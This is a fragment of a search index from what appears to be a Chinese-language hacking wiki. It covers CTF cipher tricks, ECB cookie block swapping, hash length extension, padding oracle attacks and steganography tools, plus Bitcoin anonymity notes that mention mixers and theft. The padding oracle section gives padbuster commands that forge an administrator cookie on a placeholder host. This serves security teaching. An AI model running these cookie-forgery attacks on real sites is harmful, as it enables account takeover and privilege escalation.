仿射密码编码","id":"10115","title":"仿射密码编码"},"10116":{"body":"Multitap replaces a letter by repeated digits defined by the corresponding key code on a mobile phone keypad (此模式用于编写短信)。 例如:2=A,22=B,222=C,3=D... 您可以通过看到 多个数字重复 来识别此代码。 您可以在以下网址解码此代码: https://www.dcode.fr/multitap-abc-cipher","breadcrumbs":"Crypto CTFs Tricks » SMS Code","id":"10116","title":"SMS Code"},"10117":{"body":"将每个字母替换为4个A或B(或1和0) 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000\\nAABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA","breadcrumbs":"Crypto CTFs Tricks » Bacon Code","id":"10117","title":"Bacon Code"},"10118":{"body":"","breadcrumbs":"Crypto CTFs Tricks » Runes","id":"10118","title":"Runes"},"10119":{"body":"Raw Deflate 和 Raw Inflate (你可以在 Cyberchef 中找到这两者)可以在没有头部的情况下压缩和解压数据。","breadcrumbs":"Crypto CTFs Tricks » 压缩","id":"10119","title":"压缩"},"1012":{"body":"现金交易: 通过现金获取比特币。 现金替代品: 购买礼品卡并在线兑换比特币。 挖矿: 通过挖矿获得比特币是最私密的方法,尤其是单独进行时,因为挖矿池可能知道矿工的IP地址。 Mining Pools Information 盗窃: 理论上,盗窃比特币可能是另一种匿名获取比特币的方法,尽管这是非法的且不推荐。","breadcrumbs":"Blockchain & Crypto » 匿名获取比特币的方法","id":"1012","title":"匿名获取比特币的方法"},"10120":{"body":"","breadcrumbs":"Crypto CTFs Tricks » 简易加密","id":"10120","title":"简易加密"},"10121":{"body":"https://wiremask.eu/tools/xor-cracker/","breadcrumbs":"Crypto CTFs Tricks » XOR - 自动解密器","id":"10121","title":"XOR - 自动解密器"},"10122":{"body":"需要一个关键字 fgaargaamnlunesuneoa","breadcrumbs":"Crypto CTFs Tricks » Bifid","id":"10122","title":"Bifid"},"10123":{"body":"需要一个关键词 wodsyoidrods https://www.guballa.de/vigenere-solver https://www.dcode.fr/vigenere-cipher https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx","breadcrumbs":"Crypto CTFs Tricks » Vigenere","id":"10123","title":"Vigenere"},"10124":{"body":"","breadcrumbs":"Crypto CTFs Tricks » 强加密","id":"10124","title":"强加密"},"10125":{"body":"2 个 base64 字符串(令牌和密钥) Token:\\ngAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== Key:\\n-s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= https://asecuritysite.com/encryption/ferdecode","breadcrumbs":"Crypto CTFs Tricks » Fernet","id":"10125","title":"Fernet"},"10126":{"body":"一个秘密被分成 X 部分,要恢复它需要 Y 部分 ( Y <=X )。 8019f8fa5879aa3e07858d08308dc1a8b45\\n80223035713295bddf0b0bd1b10a5340b89\\n803bc8cf294b3f83d88e86d9818792e80cd http://christian.gen.co/secrets/","breadcrumbs":"Crypto CTFs Tricks » Samir 秘密共享","id":"10126","title":"Samir 秘密共享"},"10127":{"body":"https://github.com/glv2/bruteforce-salted-openssl https://github.com/carlospolop/easy_BFopensslCTF","breadcrumbs":"Crypto CTFs Tricks » OpenSSL 暴力破解","id":"10127","title":"OpenSSL 暴力破解"},"10128":{"body":"https://github.com/Ganapati/RsaCtfTool https://github.com/lockedbyte/cryptovenom https://github.com/nccgroup/featherduster tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Crypto CTFs Tricks » 工具","id":"10128","title":"工具"},"10129":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 (ECB) 电子密码本 - 对称加密方案, 将明文的每个块 替换为 密文的块 。这是 最简单 的加密方案。其主要思想是将明文 分割 为 N位的块 (取决于输入数据块的大小和加密算法),然后使用唯一的密钥对每个明文块进行加密(解密)。 使用ECB有多种安全隐患: 可以删除加密消息中的块 可以移动加密消息中的块","breadcrumbs":"Electronic Code Book (ECB) » ECB","id":"10129","title":"ECB"},"1013":{"body":"通过使用混合服务,用户可以 发送比特币 并接收 不同的比特币作为回报 ,这使得追踪原始所有者变得困难。然而,这需要对服务的信任,以确保其不保留日志并实际返回比特币。替代的混合选项包括比特币赌场。","breadcrumbs":"Blockchain & Crypto » 混合服务","id":"1013","title":"混合服务"},"10130":{"body":"想象一下,你多次登录一个应用程序,并且 总是获得相同的cookie 。这是因为该应用程序的cookie是**| 。 然后,你生成两个新用户,他们都有 相同的长密码 和 几乎相同的** 用户名 。 你发现 8B的块 中 两个用户的信息 是 相等 的。然后,你想象这可能是因为 正在使用ECB 。 如以下示例所示。观察这 两个解码的cookie 中有几次块**\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8**。 \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x04\\\\xB6\\\\xE1H\\\\xD1\\\\x1E \\\\xB6\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8+=\\\\xD4F\\\\xF7\\\\x99\\\\xD9\\\\xA9 \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x04\\\\xB6\\\\xE1H\\\\xD1\\\\x1E \\\\xB6\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8+=\\\\xD4F\\\\xF7\\\\x99\\\\xD9\\\\xA9 这是因为这些 cookie 的 用户名和密码包含了多次字母 \\"a\\" (例如)。 不同的 块 是包含 至少 1 个不同字符 的块(可能是分隔符 \\"|\\" 或用户名中的某些必要差异)。 现在,攻击者只需发现格式是 还是 。为此,他可以 生成多个相似且较长的用户名和密码,直到找到格式和分隔符的长度: 用户名长度: 密码长度: 用户名+密码长度: Cookie 长度(解码后): 2 2 4 8 3 3 6 8 3 4 7 8 4 4 8 16 7 7 14 16","breadcrumbs":"Electronic Code Book (ECB) » 漏洞检测","id":"10130","title":"漏洞检测"},"10131":{"body":"","breadcrumbs":"Electronic Code Book (ECB) » 漏洞利用","id":"10131","title":"漏洞利用"},"10132":{"body":"知道 cookie 的格式(|),为了冒充用户名 admin,创建一个名为 aaaaaaaaadmin 的新用户并获取 cookie 并解码它: \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8\\\\xE0Vd8oE\\\\x123\\\\aO\\\\x43T\\\\x32\\\\xD5U\\\\xD4 我们可以看到之前用仅包含 a 的用户名创建的模式 \\\\x23U\\\\xE45K\\\\xCB\\\\x21\\\\xC8。 然后,您可以删除第一个 8B 块,您将获得一个有效的用户名 admin 的 cookie: \\\\xE0Vd8oE\\\\x123\\\\aO\\\\x43T\\\\x32\\\\xD5U\\\\xD4","breadcrumbs":"Electronic Code Book (ECB) » 移除整个块","id":"10132","title":"移除整个块"},"10133":{"body":"在许多数据库中,搜索 WHERE username=\'admin\'; 或 WHERE username=\'admin \'; 是一样的 (注意额外的空格) 因此,冒充用户 admin 的另一种方法是: 生成一个用户名:len() + len( 将生成 2 个 8B 的块。 然后,生成一个密码,填充包含我们想要冒充的用户名和空格的确切块数,例如:admin 该用户的 cookie 将由 3 个块组成:前 2 个是用户名 + 分隔符的块,第三个是密码(伪装成用户名):username |admin 然后,只需用最后一个块替换第一个块,就可以冒充用户 admin:admin |username","breadcrumbs":"Electronic Code Book (ECB) » 移动块","id":"10133","title":"移动块"},"10134":{"body":"http://cryptowiki.net/index.php?title=Electronic_Code_Book_(ECB) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Electronic Code Book (ECB) » 参考","id":"10134","title":"参考"},"10135":{"body":"Reading time: 4 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hash Length Extension Attack » Hash Length Extension Attack","id":"10135","title":"Hash Length Extension Attack"},"10136":{"body":"想象一个服务器,它通过将一个 秘密 附加到一些已知的明文数据上并对这些数据进行 签名 。如果你知道: 秘密的长度 (这也可以从给定的长度范围中暴力破解) 明文数据 算法(并且它对这种攻击是脆弱的) 填充是已知的 通常使用默认填充,因此如果满足其他三个要求,这也是 填充根据秘密+数据的长度而变化,这就是为什么需要知道秘密的长度 那么, 攻击者 可以 附加 数据 并为 之前的数据 + 附加的数据 生成一个有效的 签名 。","breadcrumbs":"Hash Length Extension Attack » 攻击总结","id":"10136","title":"攻击总结"},"10137":{"body":"基本上,脆弱的算法首先通过 哈希一个数据块 来生成哈希,然后,从 之前 创建的 哈希 (状态)中, 添加下一个数据块 并 哈希它 。 然后,想象秘密是“secret”,数据是“data”,\\"secretdata\\"的MD5是6036708eba0d11f6ef52ad44e8b74d5b。 如果攻击者想要附加字符串“append”,他可以: 生成64个“A”的MD5 将之前初始化的哈希状态更改为6036708eba0d11f6ef52ad44e8b74d5b 附加字符串“append” 完成哈希,结果哈希将是“secret” + “data” + “padding” + “append”的 有效哈希","breadcrumbs":"Hash Length Extension Attack » 如何?","id":"10137","title":"如何?"},"10138":{"body":"GitHub - iagox86/hash_extender","breadcrumbs":"Hash Length Extension Attack » 工具","id":"10138","title":"工具"},"10139":{"body":"你可以在 https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks 找到对这个攻击的详细解释。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hash Length Extension Attack » 参考文献","id":"10139","title":"参考文献"},"1014":{"body":"CoinJoin 将来自不同用户的多个交易合并为一个,复杂化了任何试图将输入与输出匹配的过程。尽管其有效性,具有独特输入和输出大小的交易仍然可能被追踪。 可能使用CoinJoin的示例交易包括 402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a 和 85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238。 有关更多信息,请访问 CoinJoin 。有关以太坊上的类似服务,请查看 Tornado Cash ,它通过矿工的资金匿名化交易。","breadcrumbs":"Blockchain & Crypto » CoinJoin","id":"1014","title":"CoinJoin"},"10140":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Padding Oracle » Padding Oracle","id":"10140","title":"Padding Oracle"},"10141":{"body":"在 CBC 模式下, 前一个加密块用作 IV ,与下一个块进行异或操作: https://defuse.ca/images/cbc_encryption.png 要解密 CBC,需进行 相反的 操作 : https://defuse.ca/images/cbc_decryption.png 注意需要使用 加密 密钥 和 IV 。","breadcrumbs":"Padding Oracle » CBC - 密码块链接","id":"10141","title":"CBC - 密码块链接"},"10142":{"body":"由于加密是在 固定 大小 块 中进行的,通常需要在 最后 块 中进行 填充 以完成其长度。 通常使用 PKCS7 ,它生成的填充 重复 所需的 字节 数 以 完成 块。例如,如果最后一个块缺少 3 个字节,填充将是 \\\\x03\\\\x03\\\\x03。 让我们看更多的例子,使用 2 个长度为 8 字节的块 : byte #0 byte #1 byte #2 byte #3 byte #4 byte #5 byte #6 byte #7 byte #0 byte #1 byte #2 byte #3 byte #4 byte #5 byte #6 byte #7 P A S S W O R D 1 2 3 4 5 6 0x02 0x02 P A S S W O R D 1 2 3 4 5 0x03 0x03 0x03 P A S S W O R D 1 2 3 0x05 0x05 0x05 0x05 0x05 P A S S W O R D 0x08 0x08 0x08 0x08 0x08 0x08 0x08 0x08 注意在最后一个例子中, 最后一个块是满的,因此只生成了一个填充块 。","breadcrumbs":"Padding Oracle » 消息填充","id":"10142","title":"消息填充"},"10143":{"body":"当应用程序解密加密数据时,它将首先解密数据;然后将移除填充。在清理填充的过程中,如果 无效填充触发可检测的行为 ,则存在 填充 oracle 漏洞 。可检测的行为可以是 错误 、 缺少结果 或 响应变慢 。 如果您检测到这种行为,您可以 解密加密数据 ,甚至 加密任何明文 。","breadcrumbs":"Padding Oracle » 填充 Oracle","id":"10143","title":"填充 Oracle"},"10144":{"body":"您可以使用 https://github.com/AonCyberLabs/PadBuster 来利用这种漏洞,或者直接进行 sudo apt-get install padbuster 为了测试一个网站的cookie是否存在漏洞,你可以尝试: bash perl ./padBuster.pl http://10.10.10.10/index.php \\"RVJDQrwUdTRWJUVUeBKkEA==\\" 8 -encoding 0 -cookies \\"login=RVJDQrwUdTRWJUVUeBKkEA==\\" 编码 0 意味着使用 base64 (但还有其他可用的编码,请查看帮助菜单)。 您还可以 利用此漏洞加密新数据。例如,假设 cookie 的内容是 \\" user=MyUsername \\",那么您可以将其更改为 \\"_user=administrator_\\",并在应用程序中提升权限。您还可以使用 paduster 指定 -plaintext 参数来实现这一点: bash perl ./padBuster.pl http://10.10.10.10/index.php \\"RVJDQrwUdTRWJUVUeBKkEA==\\" 8 -encoding 0 -cookies \\"login=RVJDQrwUdTRWJUVUeBKkEA==\\" -plaintext \\"user=administrator\\" 如果网站存在漏洞,padbuster将自动尝试查找何时发生填充错误,但您也可以使用**-error**参数指示错误消息。 bash perl ./padBuster.pl http://10.10.10.10/index.php \\"\\" 8 -encoding 0 -cookies \\"hcon=RVJDQrwUdTRWJUVUeBKkEA==\\" -error \\"Invalid padding\\"","breadcrumbs":"Padding Oracle » 如何利用","id":"10144","title":"如何利用"},"10145":{"body":"总结 来说,您可以通过猜测可以用于创建所有 不同填充 的正确值来开始解密加密数据。然后,填充oracle攻击将从末尾到开头解密字节,猜测哪个将是 创建1、2、3等填充的正确值 。 想象一下,您有一些加密文本,占据由 E0到E15 的 2个块 。 为了 解密 最后一个 块 ( E8 到 E15 ),整个块通过“块密码解密”,生成 中间字节I0到I15 。 最后,每个中间字节与之前的加密字节(E0到E7)进行 异或 运算。因此: C15 = D(E15) ^ E7 = I15 ^ E7 C14 = I14 ^ E6 C13 = I13 ^ E5 C12 = I12 ^ E4 ... 现在,可以 修改E7直到C15为0x01 ,这也将是一个正确的填充。因此,在这种情况下:\\\\x01 = I15 ^ E\'7 因此,找到E\'7后,可以 计算I15 :I15 = 0x01 ^ E\'7 这使我们能够 计算C15 :C15 = E7 ^ I15 = E7 ^ \\\\x01 ^ E\'7 知道 C15 后,现在可以 计算C14 ,但这次是通过暴力破解填充\\\\x02\\\\x02。 这个暴力破解与之前的复杂度相同,因为可以计算出值为0x02的E\'\'15:E\'\'7 = \\\\x02 ^ I15,因此只需找到生成**C14等于0x02的**E\'14。 然后,执行相同的步骤来解密C14: C14 = E6 ^ I14 = E6 ^ \\\\x02 ^ E\'\'6 按照这个链条,直到您解密整个加密文本。","breadcrumbs":"Padding Oracle » 理论","id":"10145","title":"理论"},"10146":{"body":"注册并使用该账户登录。 如果您 多次登录 并始终获得 相同的cookie ,那么应用程序中可能 存在问题 。每次登录时 返回的cookie应该是唯一的 。如果cookie 始终 相同,它可能始终有效,并且 无法使其失效 。 现在,如果您尝试 修改 该 cookie ,您会看到应用程序返回一个 错误 。 但是,如果您暴力破解填充(例如使用padbuster),您可以获得另一个有效的cookie,适用于不同的用户。这个场景很可能对padbuster存在漏洞。","breadcrumbs":"Padding Oracle » 漏洞检测","id":"10146","title":"漏洞检测"},"10147":{"body":"https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Padding Oracle » 参考","id":"10147","title":"参考"},"10148":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 如果你能以某种方式使用 RC4 加密明文,你可以仅使用加密函数解密任何使用相同密码加密的内容。 如果你能加密已知的明文,你也可以提取密码。更多参考资料可以在 HTB Kryptos 机器中找到: Hack The Box - Kryptos - 0xRick\\\\xe2\\\\x80\\\\x99s Blog Hack The Box - Kryptos - 0xRick\\\\xe2\\\\x80\\\\x99s Blog tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"RC4 - Encrypt&Decrypt » RC4 加密和解密","id":"10148","title":"RC4 加密和解密"},"10149":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Stego Tricks » Stego Tricks","id":"10149","title":"Stego Tricks"},"1015":{"body":"PayJoin (或P2EP)是CoinJoin的一种变体,在两个参与方(例如,客户和商家)之间伪装交易为常规交易,而没有CoinJoin特有的相等输出特征。这使得检测变得极其困难,并可能使交易监控实体使用的共同输入所有权启发式失效。 plaintext 2 btc --> 3 btc\\n5 btc 4 btc 像上面这样的交易可能是 PayJoin,增强隐私,同时与标准比特币交易无异。 PayJoin 的使用可能会显著破坏传统监控方法 ,使其在追求交易隐私方面成为一个有前景的发展。","breadcrumbs":"Blockchain & Crypto » PayJoin","id":"1015","title":"PayJoin"},"10150":{"body":"","breadcrumbs":"Stego Tricks » 从文件中提取数据","id":"10150","title":"从文件中提取数据"},"10151":{"body":"一个用于搜索二进制文件中嵌入的隐藏文件和数据的工具。它通过 apt 安装,源代码可在 GitHub 上获取。 bash binwalk file # Displays the embedded data\\nbinwalk -e file # Extracts the data\\nbinwalk --dd \\".*\\" file # Extracts all data","breadcrumbs":"Stego Tricks » Binwalk","id":"10151","title":"Binwalk"},"10152":{"body":"根据文件的头部和尾部恢复文件,对 png 图像非常有用。通过 apt 安装,源代码在 GitHub 上。 bash foremost -i file # Extracts data","breadcrumbs":"Stego Tricks » Foremost","id":"10152","title":"Foremost"},"10153":{"body":"帮助查看文件元数据,访问 这里 。 bash exiftool file # Shows the metadata","breadcrumbs":"Stego Tricks » Exiftool","id":"10153","title":"Exiftool"},"10154":{"body":"类似于 exiftool,用于查看元数据。可以通过 apt 安装,源代码在 GitHub ,并且有一个 官方网站 。 bash exiv2 file # Shows the metadata","breadcrumbs":"Stego Tricks » Exiv2","id":"10154","title":"Exiv2"},"10155":{"body":"识别您正在处理的文件类型。","breadcrumbs":"Stego Tricks » 文件","id":"10155","title":"文件"},"10156":{"body":"从文件中提取可读字符串,使用各种编码设置来过滤输出。 bash strings -n 6 file # Extracts strings with a minimum length of 6\\nstrings -n 6 file | head -n 20 # First 20 strings\\nstrings -n 6 file | tail -n 20 # Last 20 strings\\nstrings -e s -n 6 file # 7bit strings\\nstrings -e S -n 6 file # 8bit strings\\nstrings -e l -n 6 file # 16bit strings (little-endian)\\nstrings -e b -n 6 file # 16bit strings (big-endian)\\nstrings -e L -n 6 file # 32bit strings (little-endian)\\nstrings -e B -n 6 file # 32bit strings (big-endian)","breadcrumbs":"Stego Tricks » 字符串","id":"10156","title":"字符串"},"10157":{"body":"用于将修改过的文件与在线找到的原始版本进行比较。 bash cmp original.jpg stego.jpg -b -l","breadcrumbs":"Stego Tricks » 比较 (cmp)","id":"10157","title":"比较 (cmp)"},"10158":{"body":"","breadcrumbs":"Stego Tricks » 提取文本中的隐藏数据","id":"10158","title":"提取文本中的隐藏数据"},"10159":{"body":"看似空白的空间中的不可见字符可能隐藏着信息。要提取这些数据,请访问 https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder 。","breadcrumbs":"Stego Tricks » 空格中的隐藏数据","id":"10159","title":"空格中的隐藏数据"},"1016":{"body":"","breadcrumbs":"Blockchain & Crypto » 加密货币隐私的最佳实践","id":"1016","title":"加密货币隐私的最佳实践"},"10160":{"body":"","breadcrumbs":"Stego Tricks » 从图像中提取数据","id":"10160","title":"从图像中提取数据"},"10161":{"body":"GraphicMagick 用于确定图像文件类型并识别潜在的损坏。执行以下命令以检查图像: bash ./magick identify -verbose stego.jpg 要尝试修复损坏的图像,添加元数据注释可能会有所帮助: bash ./magick mogrify -set comment \'Extraneous bytes removed\' stego.jpg","breadcrumbs":"Stego Tricks » 使用 GraphicMagick 识别图像细节","id":"10161","title":"使用 GraphicMagick 识别图像细节"},"10162":{"body":"Steghide 方便地在 JPEG, BMP, WAV, 和 AU 文件中隐藏数据,能够嵌入和提取加密数据。使用 apt 安装非常简单,其 源代码可在 GitHub 上获取 。 命令: steghide info file 显示文件是否包含隐藏数据。 steghide extract -sf file [--passphrase password] 提取隐藏数据,密码可选。 要进行基于网页的提取,请访问 此网站 。 使用 Stegcracker 进行暴力破解攻击: 要尝试对 Steghide 进行密码破解,请使用 stegcracker 如下: bash stegcracker []","breadcrumbs":"Stego Tricks » Steghide用于数据隐藏","id":"10162","title":"Steghide用于数据隐藏"},"10163":{"body":"zsteg专注于揭示PNG和BMP文件中的隐藏数据。安装通过gem install zsteg完成,其 源代码在GitHub上 。 命令: zsteg -a file对文件应用所有检测方法。 zsteg -E file指定用于数据提取的有效载荷。","breadcrumbs":"Stego Tricks » zsteg用于PNG和BMP文件","id":"10163","title":"zsteg用于PNG和BMP文件"},"10164":{"body":"stegoVeritas 检查元数据,执行图像转换,并应用LSB暴力破解等功能。使用stegoveritas.py -h获取完整选项列表,使用stegoveritas.py stego.jpg执行所有检查。 Stegsolve 应用各种颜色滤镜以揭示图像中的隐藏文本或消息。它可在 GitHub上 获取。","breadcrumbs":"Stego Tricks » StegoVeritas和Stegsolve","id":"10164","title":"StegoVeritas和Stegsolve"},"10165":{"body":"快速傅里叶变换(FFT)技术可以揭示图像中的隐蔽内容。实用资源包括: EPFL演示 Ejectamenta GitHub上的FFTStegPic","breadcrumbs":"Stego Tricks » FFT用于隐藏内容检测","id":"10165","title":"FFT用于隐藏内容检测"},"10166":{"body":"Stegpy允许将信息嵌入图像和音频文件,支持PNG、BMP、GIF、WebP和WAV等格式。它可在 GitHub上 获取。","breadcrumbs":"Stego Tricks » Stegpy用于音频和图像文件","id":"10166","title":"Stegpy用于音频和图像文件"},"10167":{"body":"要分析PNG文件或验证其真实性,请使用: bash apt-get install pngcheck\\npngcheck stego.png","breadcrumbs":"Stego Tricks » Pngcheck用于PNG文件分析","id":"10167","title":"Pngcheck用于PNG文件分析"},"10168":{"body":"要进一步探索,请考虑访问: Magic Eye Solver Image Error Level Analysis Outguess OpenStego DIIT","breadcrumbs":"Stego Tricks » 图像分析的附加工具","id":"10168","title":"图像分析的附加工具"},"10169":{"body":"音频隐写术 提供了一种独特的方法,将信息隐藏在声音文件中。使用不同的工具来嵌入或检索隐藏的内容。","breadcrumbs":"Stego Tricks » 从音频中提取数据","id":"10169","title":"从音频中提取数据"},"1017":{"body":"为了维护隐私和安全,与区块链同步钱包至关重要。有两种方法脱颖而出: 全节点 :通过下载整个区块链,全节点确保最大隐私。所有曾经进行的交易都存储在本地,使对手无法识别用户感兴趣的交易或地址。 客户端区块过滤 :此方法涉及为区块链中的每个区块创建过滤器,使钱包能够识别相关交易,而不向网络观察者暴露特定兴趣。轻量级钱包下载这些过滤器,仅在找到与用户地址匹配时才获取完整区块。","breadcrumbs":"Blockchain & Crypto » 钱包同步技术","id":"1017","title":"钱包同步技术"},"10170":{"body":"Steghide是一个多功能工具,旨在将数据隐藏在JPEG、BMP、WAV和AU文件中。详细说明请参见 stego tricks documentation 。","breadcrumbs":"Stego Tricks » Steghide (JPEG, BMP, WAV, AU)","id":"10170","title":"Steghide (JPEG, BMP, WAV, AU)"},"10171":{"body":"该工具兼容多种格式,包括PNG、BMP、GIF、WebP和WAV。有关更多信息,请参阅 Stegpy\'s section 。","breadcrumbs":"Stego Tricks » Stegpy (PNG, BMP, GIF, WebP, WAV)","id":"10171","title":"Stegpy (PNG, BMP, GIF, WebP, WAV)"},"10172":{"body":"ffmpeg对于评估音频文件的完整性至关重要,突出详细信息并指出任何差异。 bash ffmpeg -v info -i stego.mp3 -f null -","breadcrumbs":"Stego Tricks » ffmpeg","id":"10172","title":"ffmpeg"},"10173":{"body":"WavSteg 擅长使用最低有效位策略在 WAV 文件中隐藏和提取数据。它可以在 GitHub 上获取。命令包括: bash python3 WavSteg.py -r -b 1 -s soundfile -o outputfile python3 WavSteg.py -r -b 2 -s soundfile -o outputfile","breadcrumbs":"Stego Tricks » WavSteg (WAV)","id":"10173","title":"WavSteg (WAV)"},"10174":{"body":"Deepsound 允许使用 AES-256 对声音文件中的信息进行加密和检测。可以从 the official page 下载。","breadcrumbs":"Stego Tricks » Deepsound","id":"10174","title":"Deepsound"},"10175":{"body":"Sonic Visualizer 是一个用于音频文件的视觉和分析检查的宝贵工具,可以揭示其他方法无法检测到的隐藏元素。访问 official website 了解更多信息。","breadcrumbs":"Stego Tricks » Sonic Visualizer","id":"10175","title":"Sonic Visualizer"},"10176":{"body":"通过在线工具可以检测音频文件中的 DTMF 音调,例如 this DTMF detector 和 DialABC 。","breadcrumbs":"Stego Tricks » DTMF Tones - Dial Tones","id":"10176","title":"DTMF Tones - Dial Tones"},"10177":{"body":"","breadcrumbs":"Stego Tricks » Other Techniques","id":"10177","title":"Other Techniques"},"10178":{"body":"平方为整数的二进制数据可能表示 QR 码。使用此代码片段进行检查: python import math\\nmath.sqrt(2500) #50 对于二进制到图像的转换,请查看 dcode 。要读取二维码,请使用 this online barcode reader 。","breadcrumbs":"Stego Tricks » Binary Length SQRT - QR Code","id":"10178","title":"Binary Length SQRT - QR Code"},"10179":{"body":"对于盲文翻译, Branah Braille Translator 是一个很好的资源。","breadcrumbs":"Stego Tricks » 盲文翻译","id":"10179","title":"盲文翻译"},"1018":{"body":"鉴于比特币在点对点网络上运行,建议使用 Tor 来掩盖您的 IP 地址,在与网络交互时增强隐私。","breadcrumbs":"Blockchain & Crypto » 利用 Tor 实现匿名性","id":"1018","title":"利用 Tor 实现匿名性"},"10180":{"body":"https://0xrick.github.io/lists/stego/ https://github.com/DominicBreuker/stego-toolkit tip 学习和实践 AWS 黑客技术: 